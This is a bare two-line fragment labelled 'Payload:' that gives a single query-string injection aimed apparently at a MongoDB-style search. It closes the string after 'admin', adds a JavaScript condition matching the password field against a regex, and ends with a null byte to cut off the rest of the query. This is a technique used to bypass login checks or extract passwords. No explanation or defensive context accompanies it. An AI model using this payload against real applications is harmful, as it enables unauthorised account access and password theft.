Payload:
?search=admin' && this.password.match(/^.*$/)%00